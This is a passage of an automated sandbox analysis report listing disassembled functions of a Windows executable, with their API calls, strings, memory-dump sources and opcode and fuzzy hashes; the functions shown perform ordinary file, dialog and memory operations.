                                                                                    • API String ID: 562999700-834177443
                                                                                    • Opcode ID: 385157331881866287f1723ab75f3f4c01b85e87f4e439809837cd66eddb367f
                                                                                    • Instruction ID: 32a3c694422b8237202525c493174bbbe71e4d93ccebe7be3e681bc10ebb04c3
                                                                                    • Opcode Fuzzy Hash: 385157331881866287f1723ab75f3f4c01b85e87f4e439809837cd66eddb367f
                                                                                    • Instruction Fuzzy Hash: E621907244025CEAEB31EEA4DC05FDE7BA8EF05300F044126F990961A2E779EA988B51
                                                                                    Function 00730E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0072AC5A,00000008,?,00000000,?,0072D22D,?,00000000), ref: 00730E85
                                                                                    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0072AC5A,00000008,?,00000000,?,0072D22D,?,00000000), ref: 00730E8F
                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0072AC5A,00000008,?,00000000,?,0072D22D,?,00000000), ref: 00730E9F
                                                                                    Strings
                                                                                    • Thread pool initialization failed., xrefs: 00730EB7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                    • String ID: Thread pool initialization failed.
                                                                                    • API String ID: 3340455307-2182114853
                                                                                    • Opcode ID: bfc10921bfaa67f63b7f4ffbd4d661a42aeb3396380515d9361b13b5122854f3
                                                                                    • Instruction ID: 2a493da21535033cfc96f1cfbc4d90e9e64c8e074360f885139055ebf2eaf746
                                                                                    • Opcode Fuzzy Hash: bfc10921bfaa67f63b7f4ffbd4d661a42aeb3396380515d9361b13b5122854f3
                                                                                    • Instruction Fuzzy Hash: DF11A3B174070C9FD3216F769C889A7FBECEB54754F144C2EF1DAC2201D6B969808BA4
                                                                                    Function 0072124F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Malloc
                                                                                    • String ID: (s$2s$A
                                                                                    • API String ID: 2696272793-3699640820
                                                                                    • Opcode ID: 79b28cf346e344f66fb151995496e40c840d158a6cb1ea9784dd44b7bdbf5c37
                                                                                    • Instruction ID: 1e2223f70b577ee5254c014553fcd74677307ee944acad906459f4288d5710d9
                                                                                    • Opcode Fuzzy Hash: 79b28cf346e344f66fb151995496e40c840d158a6cb1ea9784dd44b7bdbf5c37
                                                                                    • Instruction Fuzzy Hash: FE01DB75901229ABCB14DFA4E844ADEBBF8FF09710B20415AE905E7250D7789A40CF94
                                                                                    Function 0073DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                    • API String ID: 0-56093855
                                                                                    • Opcode ID: f10e708e823852069c3df4ff2a12238bef789f53a3e3545c133f969f9e7c6857
                                                                                    • Instruction ID: 4ff6766fd68c9d46ead6690b3486ced1d2cccefb9832ce845822592a61044ecd
                                                                                    • Opcode Fuzzy Hash: f10e708e823852069c3df4ff2a12238bef789f53a3e3545c133f969f9e7c6857
                                                                                    • Instruction Fuzzy Hash: C001B575614385AFEB614FA8FC049567FA5F708394F148136F80693232CB7C8C90DBA6
                                                                                    Function 00721316 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0072E2E8: _swprintf.LIBCMT ref: 0072E30E
                                                                                      • Part of subcall function 0072E2E8: _strlen.LIBCMT ref: 0072E32F
                                                                                      • Part of subcall function 0072E2E8: SetDlgItemTextW.USER32(?,0075E274,?), ref: 0072E38F
                                                                                      • Part of subcall function 0072E2E8: GetWindowRect.USER32(?,?), ref: 0072E3C9
                                                                                      • Part of subcall function 0072E2E8: GetClientRect.USER32(?,?), ref: 0072E3D5
                                                                                    • GetDlgItem.USER32(00000000,00003021), ref: 0072135A
                                                                                    • SetWindowTextW.USER32(00000000,007535F4), ref: 00721370
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                    • String ID: s$0
                                                                                    • API String ID: 2622349952-570894310
                                                                                    • Opcode ID: fbd0dc3130c47c973e0cb99cdfc13c7f8afabbe5f4331ddda25eab9248405a05
                                                                                    • Instruction ID: ceed230df425bbfc0c81d8db20f3833838c79e436b609ec5a0c70ae6fa36a913
                                                                                    • Opcode Fuzzy Hash: fbd0dc3130c47c973e0cb99cdfc13c7f8afabbe5f4331ddda25eab9248405a05
                                                                                    • Instruction Fuzzy Hash: 50F0C2311443ACAADF158F64EC0DBEA3B9BBF20784F498124FC45909A2DB7CC990EB10
                                                                                    Function 00749A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: __alldvrm$_strrchr
                                                                                    • String ID:
                                                                                    • API String ID: 1036877536-0
                                                                                    • Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                    • Instruction ID: bdeb26fcac3de2d2c292500fac221b22670970833f1ca1814ec9624a958afd65
                                                                                    • Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                    • Instruction Fuzzy Hash: 7CA11472A043869FEB21CF28C8917AFBBE5EF55310F1845ADE6859B282D73C9941C760
                                                                                    Function 0072A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00727F69,?,?,?), ref: 0072A3FA
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00727F69,?), ref: 0072A43E
                                                                                    • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00727F69,?,?,?,?,?,?,?), ref: 0072A4BF
                                                                                    • CloseHandle.KERNEL32(?,?,?,00000800,?,00727F69,?,?,?,?,?,?,?,?,?,?), ref: 0072A4C6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Create$CloseHandleTime
                                                                                    • String ID:
                                                                                    • API String ID: 2287278272-0
                                                                                    • Opcode ID: 9ab11fcd17f32d304cf4d36fd094aef873e821b8e3e8fca6c62c977b37979761
                                                                                    • Instruction ID: 1e684a73b094345248536598ddd106ebcefafe639fcd7fc95a69fd90254390fb
                                                                                    • Opcode Fuzzy Hash: 9ab11fcd17f32d304cf4d36fd094aef873e821b8e3e8fca6c62c977b37979761
                                                                                    • Instruction Fuzzy Hash: 8741CE30248391ABE721EF28EC49FEEBBE4AB90300F04091DB5D4931D1D6A8DA4C9B53
                                                                                    Function 0074C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,007491E0,?,00000000,?,00000001,?,?,00000001,007491E0,?), ref: 0074C9D5
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0074CA5E
                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00746CBE,?), ref: 0074CA70
                                                                                    • __freea.LIBCMT ref: 0074CA79
                                                                                      • Part of subcall function 00748E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0074CA2C,00000000,?,00746CBE,?,00000008,?,007491E0,?,?,?), ref: 00748E38
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                    • String ID:
                                                                                    • API String ID: 2652629310-0
                                                                                    • Opcode ID: 160492602dafee7bdb4f6986e2c4305a8b7d5a2f0e6c9bcef88f903bae00a89f
                                                                                    • Instruction ID: 2d564270878c5035ecfded40e034aa591679c2de812d959179a7d3d6c0711b23
                                                                                    • Opcode Fuzzy Hash: 160492602dafee7bdb4f6986e2c4305a8b7d5a2f0e6c9bcef88f903bae00a89f
                                                                                    • Instruction Fuzzy Hash: 5B319072A0221AABDF26DF74DC45DEE7BA5EB41350F148168FC04E6261EB39DD50CB90
                                                                                    Function 0073A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDC.USER32(00000000), ref: 0073A666
                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0073A675
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0073A683
                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0073A691
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: CapsDevice$Release
                                                                                    • String ID:
                                                                                    • API String ID: 1035833867-0
                                                                                    • Opcode ID: 133c7bbd71f7434e9ac48a6b8872eefea6f70efe60366c51d0ccd459b736d500
                                                                                    • Instruction ID: d1ca2fc1246f3c36894a9c6436843371072adf69502d341c4059af5dc3b394e5
                                                                                    • Opcode Fuzzy Hash: 133c7bbd71f7434e9ac48a6b8872eefea6f70efe60366c51d0ccd459b736d500
                                                                                    • Instruction Fuzzy Hash: 84E01D31982721F7D3615F65FC4EF8B3E55AB05F92F118101F605951D0DF7C45008B9A
                                                                                    Function 0073D06A Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 278COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcschr
                                                                                    • String ID: .lnk$ds
                                                                                    • API String ID: 2691759472-1819217326
                                                                                    • Opcode ID: 3cb0bd940c676f96703609ae72cc16db184e53bc6c1d69a98ffa17538498f3b6
                                                                                    • Instruction ID: a780ea51195344ca51725b2f1cdb487c20d99200bf7fb6156ec6cc7c409d317f
                                                                                    • Opcode Fuzzy Hash: 3cb0bd940c676f96703609ae72cc16db184e53bc6c1d69a98ffa17538498f3b6
                                                                                    • Instruction Fuzzy Hash: DDA1317290012996EF34DBA4DD59EFA73FCAF44304F0885A6B509E7142EF789F848B61
                                                                                    Function 007275DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 007275E3
                                                                                      • Part of subcall function 007305DA: _wcslen.LIBCMT ref: 007305E0
                                                                                      • Part of subcall function 0072A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0072A598
                                                                                    • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0072777F
                                                                                      • Part of subcall function 0072A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0072A325,?,?,?,0072A175,?,00000001,00000000,?,?), ref: 0072A501
                                                                                      • Part of subcall function 0072A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0072A325,?,?,?,0072A175,?,00000001,00000000,?,?), ref: 0072A532
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                    • String ID: :
                                                                                    • API String ID: 3226429890-336475711
                                                                                    • Opcode ID: adcf2ebc30a80a9dab05f85128509530999918f4a090584c96ff1a10326570d1
                                                                                    • Instruction ID: 1a38f0851ea02628fefc6c228bdf855212fdacccc5a932e0732585c9064832b7
                                                                                    • Opcode Fuzzy Hash: adcf2ebc30a80a9dab05f85128509530999918f4a090584c96ff1a10326570d1
                                                                                    • Instruction Fuzzy Hash: 9C419371900268EAEB25EB64ED59EEEB37DAF41300F004096B605A3192DB7C5F85CF71
                                                                                    Function 0072B37A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcschr
                                                                                    • String ID: *
                                                                                    • API String ID: 2691759472-163128923
                                                                                    • Opcode ID: 7985bc28a83feffab0475d374281f55b75ec3c9c3bcd6989fd07644475e73698
                                                                                    • Instruction ID: e85ac5f1a976302305b7c9b49f4f03069d697e13cf7483fe45f27cbf396c8896
                                                                                    • Opcode Fuzzy Hash: 7985bc28a83feffab0475d374281f55b75ec3c9c3bcd6989fd07644475e73698
                                                                                    • Instruction Fuzzy Hash: 243146325043B19ACB30FE54B986A7B73E4DFA1B50F55801EFD8447143E76E9E829361
                                                                                    Function 0073B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen
                                                                                    • String ID: }
                                                                                    • API String ID: 176396367-4239843852
                                                                                    • Opcode ID: 15db0571cbccbb4bc0eeca3d3a4eb872293faa3b009f3e26f26345f1f4cd3dd4
                                                                                    • Instruction ID: f492b261b45263f8f3b8a301760a611b848dd7af3ca790354d667b6c77510091
                                                                                    • Opcode Fuzzy Hash: 15db0571cbccbb4bc0eeca3d3a4eb872293faa3b009f3e26f26345f1f4cd3dd4
                                                                                    • Instruction Fuzzy Hash: CA21F37290531A9AEB31EA64D849F6FB3DCDF81750F04042AF684C3143EB6DDD5883A2
                                                                                    Function 0072F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0072F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0072F2E4
                                                                                      • Part of subcall function 0072F2C5: GetProcAddress.KERNEL32(007681C8,CryptUnprotectMemory), ref: 0072F2F4
                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,0072F33E), ref: 0072F3D2
                                                                                    Strings
                                                                                    • CryptProtectMemory failed, xrefs: 0072F389
                                                                                    • CryptUnprotectMemory failed, xrefs: 0072F3CA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
